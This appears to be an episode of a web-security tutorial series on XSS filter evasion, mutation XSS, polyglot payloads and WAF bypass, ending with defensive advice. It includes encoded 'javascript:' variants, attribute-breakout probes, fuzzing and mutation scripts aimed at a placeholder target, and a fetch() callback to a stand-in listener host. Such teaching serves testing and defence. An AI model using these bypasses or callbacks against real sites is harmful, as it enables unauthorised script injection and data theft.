XSS Filter Evasion, Polyglots & WAF Bypass Tactics

Learn advanced XSS filter evasion, polyglot payloads, and WAF bypass tactics to understand modern client-side attack paths and defenses.

By Episode 3, we were tracing tainted data through modern frontend code like a bloodhound: source, transform, sink, execution. But real targets rarely hand you a clean innerHTML sink with zero defenses. They give you “sanitization,” regex filters, brittle blacklist logic, WAF signatures, markdown renderers, HTML rewriters, and browser parsers that do not agree with the developer’s mental model. That gap between what defenders think they blocked and what the browser actually does is where filter evasion lives.

This episode is about exploiting that gap safely and systematically. We’ll look at how naive sanitizers fail, why parser differentials matter, how mutation XSS turns “sanitized” markup back into active code, how polyglot payloads survive uncertainty, and how to reason about WAF bypasses without devolving into payload cargo culting. The goal is not memorizing a zoo of strings. It’s learning how to generate bypasses from first principles.

Why filters fail: the browser is not a regex engine

Most broken XSS defenses fail for one of four reasons:

They sanitize the wrong context
- HTML escaping used for JavaScript
- URL validation used for HTML attributes
- Server-side filtering applied before client-side decoding
They normalize incompletely
- Single decoding pass
- Case-sensitive checks
- Failure to canonicalize whitespace, entities, or Unicode forms
They misunderstand parser behavior
- HTML parser repairs malformed markup
- Attribute parsing is more permissive than expected
- Browser mutation rewrites DOM in dangerous ways
They rely on blacklists
- Block <script> but allow event handlers
- Block onerror but allow srcdoc
- Block javascript: literally but miss encoded or transformed variants

A typical anti-pattern looks like this:

function weakSanitize(input) {
  return input
    .replace(/<script.*?>.*?<\/script>/gi, '')
    .replace(/onerror/gi, '')
    .replace(/onload/gi, '');
}

element.innerHTML = weakSanitize(userInput);

This filter assumes:

script tags are the only execution path
event handlers are known and enumerable
the payload arrives in one stable textual form
the browser won’t reinterpret malformed HTML

All of those assumptions are false.

Build a bypass workflow, not a payload list

As we saw in earlier episodes, context is everything. For evasion, add a second model:

input form → app transforms → filter/WAF transforms → browser parse → DOM mutation → execution

When facing a filter, answer these questions in order:

1. What exactly is being filtered?

Compare:

raw request
reflected response
live DOM after parsing
DOM after client-side rewrites

Use Burp Repeater and browser DevTools together. For example:

bash

curl -i 'https://target.example/search?q=%3Csvg%20onload%3Dconsole.log(1)%3E'

Then inspect:

whether the server rewrites case
whether entities are decoded once or twice
whether the browser inserts quotes, closes tags, or moves nodes

2. Is the filter pre-parse or post-parse?

A server-side regex sees bytes. The browser sees tokens and nodes. If the filter strips <script> but allows malformed HTML that the browser repairs into executable DOM, you may have a parser differential.

3. Is there a decode or transform step after filtering?

Classic red flags:

URL decoding after validation
HTML entity decoding in a template helper
markdown rendering after “safe text” checks
client-side decodeURIComponent() before assignment to innerHTML

4. Can you switch execution primitives?

If <script> is blocked:

event handlers
SVG/MathML behaviors
iframe srcdoc
dangerous URL schemes where allowed
DOM clobbering into existing code paths
mutation-based reactivation

The right bypass is usually not “more obfuscation.” It’s “a different sink primitive.”

Canonicalization attacks: beat the filter’s view of the world

Canonicalization is the process of reducing multiple equivalent encodings to a single normalized form. Filters that inspect non-canonical input are fragile.

Mixed encoding and decoding mismatches

Suppose the application blocks javascript: in href values:

if (input.toLowerCase().includes('javascript:')) reject();

But later it decodes entities or percent-encoding before rendering. Then variants may survive validation and become active later.

Educational examples of transformations to test:

text

javascript:
java&#x73;cript:
java%73cript:
jav&#97;script:

The point is not that every modern browser will execute every variant in every context. The point is to test whether:

the filter inspects one representation
a later stage transforms it into another
the browser consumes the transformed version

Whitespace and control character confusion

Weak filters often look for exact substrings like onerror= or javascript:. Browser tokenization may tolerate surprising separators or normalization.

Probe for:

tabs
newlines
carriage returns
form feeds
multiple spaces
mixed case

Example fuzzing idea:

python

# educational fuzz helper
tokens = ["onload", "onerror", "javascript:"]
separators = [" ", "\t", "\n", "\r", "\f"]

for token in tokens:
    for sep in separators:
        print(token.replace("a", "a" + sep))

Again, the value is not a magic string. It’s observing whether the target canonicalizes before checking.

Double decoding bugs

A common anti-pattern:

const input = req.query.q;           // %253Csvg...%253E
if (input.includes('<')) reject();   // sees no literal <
const decoded = decodeURIComponent(input); 
element.innerHTML = decoded;

Test for this with staged encoding. If one decode happens server-side and another client-side, payloads can emerge only at the sink.

Parser confusion: the browser repairs your exploit for you

HTML parsers are designed to recover from broken markup. Filters are often designed as if malformed input just stays malformed.

Attribute breakout via quote assumptions

If a filter only escapes double quotes but not single quotes, backticks, or unquoted attribute edge cases, you may still break context depending on how the template is built.

Example vulnerable template:

html

<div data-name='USER_INPUT'></div>

Weak defense:

input = input.replace(/"/g, '&quot;');

That does nothing for single-quoted context.

A safe way to test behavior without immediate execution is to inject benign markers and inspect the repaired DOM:

text

' data-probe='x

Then see whether a new attribute appears in DevTools. Once you confirm breakout, you can move to an execution primitive appropriate for that context.

Tag balancing and browser auto-closing

Applications often strip > or specific tags but leave enough structure for the parser to reconstruct dangerous markup.

For example, if a markdown or HTML filter allows fragments like this through:

html

<svg

and later concatenation or parser repair completes the node, you may get executable elements despite incomplete original input.

Foreign content: SVG and MathML

Some sanitizers focus on HTML tags and forget that browsers parse SVG and MathML with their own rules. Historically, this has been fertile ground for bypasses and mutation XSS.

Even when direct script execution is blocked, foreign-content parsing can:

create unexpected namespaces
preserve attributes differently
mutate when inserted into the DOM
interact badly with sanitizers that serialize and reparse markup

Mutation XSS: sanitized now, dangerous later

Mutation XSS, or mXSS, happens when markup is sanitized into a form that appears inert, but browser parsing or DOM mutation transforms it into executable markup later.

This matters because many sanitizers work like this:

parse untrusted HTML
remove dangerous nodes/attributes
serialize back to a string
assign that string to innerHTML somewhere else

That final reparse can change semantics.

Why mXSS happens

Different stages may use:

different parsers
different namespaces
different serialization rules
different DOM repair logic

A sanitizer may inspect one DOM tree, but the browser eventually executes another.

Practical testing pattern

When you suspect mXSS:

Put the candidate payload through the application normally.
Capture the stored/rendered HTML.
Reinsert that exact output into a local test harness.
Compare:
- original input
- sanitizer output
- final DOM after browser parse

Minimal harness:

html

<!doctype html>
<html>
<body>
<div id="app"></div>
<script>
  const sanitizedOutput = `PASTE_OUTPUT_HERE`;
  document.getElementById('app').innerHTML = sanitizedOutput;
  console.log(document.getElementById('app').innerHTML);
</script>
</body>
</html>

If the browser mutates the markup into something more dangerous than the sanitizer intended, you’ve got a strong lead.

What to look for

Look for:

attribute reordering or quote insertion
namespace changes in SVG/MathML
unexpected node creation
repaired malformed tags
text becoming markup after decode/reparse chains

Modern hardened sanitizers have reduced many historical mXSS cases, but bespoke sanitizers and legacy libraries still fail here.

Polyglots: payloads for uncertain contexts

Polyglot payloads are designed to remain syntactically meaningful across multiple parsing contexts. They’re useful when:

the exact sink is unclear
your input may land in HTML, attribute, JS string, or URL contexts depending on route or template branch
you need a discovery probe that survives transformations

A polyglot is not a universal instant-win string. It’s a reconnaissance tool and sometimes a bypass aid.

What makes a good polyglot

A useful polyglot:

breaks out of multiple likely contexts
degrades gracefully if one context fails
includes a low-noise execution or callback primitive
is short enough to survive truncation and storage quirks

Example strategy, not magic

Instead of memorizing one famous payload, think in layers:

close current context if possible
open a new executable context
leave trailing characters harmless

For example, if your input might appear in:

HTML text
quoted attribute
script string

you want a prefix that can terminate at least some of those contexts, then fall into a new tag or handler.

A safe discovery-oriented approach is to use a callback marker rather than alert():

fetch('https://listener.example/xss?probe=polyglot4')

Then embed that callback in a context-appropriate primitive after you learn where breakout occurs.

Polyglots and WAFs

Polyglots often trigger signatures because they contain many suspicious delimiters. On hardened targets, a smaller context-specific bypass usually beats a giant “works everywhere” string.

Use polyglots to map uncertainty. Use precision payloads to land the exploit.

WAF bypass tactics: think like a normalizer

WAFs usually inspect HTTP requests, not final browser DOM. That means they lose whenever:

dangerous semantics emerge only after app-side transforms
the payload is split across parameters or requests
the browser repairs malformed input into executable markup
client-side code assembles the final sink value

Parameter fragmentation

If a frontend concatenates multiple values into one sink, but the WAF inspects parameters independently, execution can emerge only after assembly.

Example pattern:

const html = part1 + part2 + part3;
target.innerHTML = html;

You may see this in template fragments, markdown options, or widget configs.

JSON and nested structures

WAF rules tuned for URL parameters often miss payloads hidden in:

JSON bodies
arrays
nested object fields
GraphQL variables

Use realistic content types:

bash

curl -i https://target.example/api/profile \
  -H 'Content-Type: application/json' \
  --data '{"bio":"<probe>"}'

Then observe how that field is rendered later.

Alternate request paths

A WAF may protect the main web app but not:

API subdomains
upload processors
preview endpoints
websocket/bootstrap APIs
mobile-specific endpoints

The XSS sink is often downstream from the protected edge.

Signature evasion versus semantic evasion

There are two very different ways to bypass a WAF:

Signature evasion
- alter bytes so the WAF misses a known pattern
- case changes, encoding, fragmentation
Semantic evasion
- use a different browser feature than the WAF expects
- no <script>, no obvious handler, no literal dangerous scheme

Semantic evasion is usually more reliable because it survives normalization. If the WAF blocks <script>, don’t spend all day trying to smuggle <script>. Ask what other executable semantics the browser accepts in that sink.

Differential analysis: app, WAF, browser

The cleanest way to study bypasses is differential testing.

Step 1: establish a baseline probe set

Use harmless probes first:

text

xsstest123
"><xsstest>
' data-probe='1
<svg
javascript:

Step 2: compare responses through different paths

direct app response
response behind CDN/WAF
mobile/API path
stored render path
live DOM after framework hydration

Step 3: automate mutations

A tiny mutation harness can save hours:

python

import itertools
import requests

base = "https://target.example/search"
parts = ["<svg", "<img", "onload", "onerror", "srcdoc", "javascript:"]
encoders = [
    lambda s: s,
    lambda s: s.upper(),
    lambda s: s.replace("a", "&#97;"),
]

for p, e in itertools.product(parts, encoders):
    candidate = e(p)
    r = requests.get(base, params={"q": candidate}, timeout=10)
    print(candidate, r.status_code, len(r.text))

This won’t “find XSS” by itself. It highlights normalization differences, blocking thresholds, and weird reflections worth manual follow-up.

Real-world anti-patterns worth hunting

Weak markdown sanitization

Pipeline:

user markdown
markdown renderer
HTML allowlist
final innerHTML

Problems:

raw HTML partially allowed
links/images insufficiently validated
post-render rewrites introduce dangerous attributes
code fences or embedded HTML mutate on reparse

“Strip tags” then trust output

Classic bug:

input = input.replace(/<[^>]+>/g, '');

This is not sanitization. It can be bypassed by malformed markup, entity tricks, parser repair, and anything that becomes markup later through decoding or concatenation.

Client-side sanitization only

If the server stores raw input and the browser sanitizes on render, any alternate render path, legacy client, or admin tool may become exploitable.

Homegrown allowlists

Developers allow “safe tags” but forget:

dangerous attributes
namespace-specific behavior
URL-valued attributes
srcdoc
custom elements interacting with framework code
DOM clobbering side effects

Defenses that actually hold up

Evasion exists because defenses are often ad hoc. The answer is not a bigger blacklist.

1. Eliminate dangerous sinks where possible

Prefer:

textContent
innerText
safe attribute setters for known-safe attributes
framework auto-escaping paths

Avoid raw HTML insertion unless absolutely necessary.

2. Use context-correct output encoding

Encode for the exact sink:

HTML text
HTML attribute
JavaScript string
CSS
URL

One encoder does not fit all contexts.

3. Sanitize with a mature HTML sanitizer

Use a well-maintained sanitizer with:

secure defaults
namespace-aware parsing
active patching for mXSS and browser quirks

Then keep it updated. Old sanitizer versions are frequent bypass targets.

4. Normalize before validation

If you must validate structured input:

decode once in a controlled place
normalize case and Unicode where relevant
reject ambiguous forms
avoid multi-stage decode pipelines

5. Enforce browser-side mitigations

We’ll go deep on these next episode’s successor, but the high-level stack is:

strong CSP
Trusted Types
safe templating
no inline event handlers
no string-to-code APIs

These controls don’t replace sanitization, but they dramatically reduce exploitability when sanitization fails.

6. Test sanitizers against browser reality

Unit-test with:

hostile HTML samples
serialization/reparse cycles
SVG/MathML cases
framework hydration paths
stored and reflected render paths

If your sanitizer only passes string-based tests and never browser DOM tests, you’re flying blind.

A practical lab mindset

When you hit a filtered target, don’t ask, “What payload bypasses this WAF?”

Ask:

What representation does the filter inspect?
What transformations happen after inspection?
What parser will ultimately interpret the data?
Can I shift to a different execution primitive?
Can browser mutation reactivate something the sanitizer thought was inert?

That mindset scales far better than memorizing 500 payloads from a gist.

A good engagement notebook for this episode’s techniques should track:

text

Input sent:
Observed server reflection:
Observed DOM after parse:
Observed DOM after client rewrite:
Blocked by WAF?:
Normalized/decoded?:
Potential alternate primitive:
Stored path differs?:

That structure turns “try random payloads” into disciplined exploit development.

Closing thoughts

Filter evasion is not wizardry. It’s just exploiting mismatches: between bytes and tokens, strings and DOM nodes, validation and canonicalization, sanitizer output and browser mutation, WAF signatures and actual execution semantics. The strongest attackers are not the ones with the biggest payload list. They’re the ones who can explain exactly why a bypass works.

In the next episode, we’ll assume you’ve landed code execution and move to what matters most in a real assessment: impact. We’ll chain XSS into account takeover, privileged action abuse, token theft, and sensitive data exfiltration—the difference between “it pops” and “this is business-critical.”

XSS Filter Evasion, Polyglots & WAF Bypass Tactics

Why filters fail: the browser is not a regex engine

Build a bypass workflow, not a payload list

1. What exactly is being filtered?

2. Is the filter pre-parse or post-parse?

3. Is there a decode or transform step after filtering?

4. Can you switch execution primitives?

Canonicalization attacks: beat the filter’s view of the world

Mixed encoding and decoding mismatches

Whitespace and control character confusion

Double decoding bugs

Parser confusion: the browser repairs your exploit for you

Attribute breakout via quote assumptions

Tag balancing and browser auto-closing

Foreign content: SVG and MathML

Mutation XSS: sanitized now, dangerous later

Why mXSS happens

Practical testing pattern

What to look for

Polyglots: payloads for uncertain contexts

What makes a good polyglot

Example strategy, not magic

Polyglots and WAFs

WAF bypass tactics: think like a normalizer

Common WAF blind spots

Parameter fragmentation

JSON and nested structures

Alternate request paths

Signature evasion versus semantic evasion

Differential analysis: app, WAF, browser

Step 1: establish a baseline probe set

Step 2: compare responses through different paths

Step 3: automate mutations

Real-world anti-patterns worth hunting

Weak markdown sanitization

“Strip tags” then trust output

Client-side sanitization only

Homegrown allowlists

Defenses that actually hold up

1. Eliminate dangerous sinks where possible

2. Use context-correct output encoding

3. Sanitize with a mature HTML sanitizer

4. Normalize before validation

5. Enforce browser-side mitigations

6. Test sanitizers against browser reality

A practical lab mindset

Closing thoughts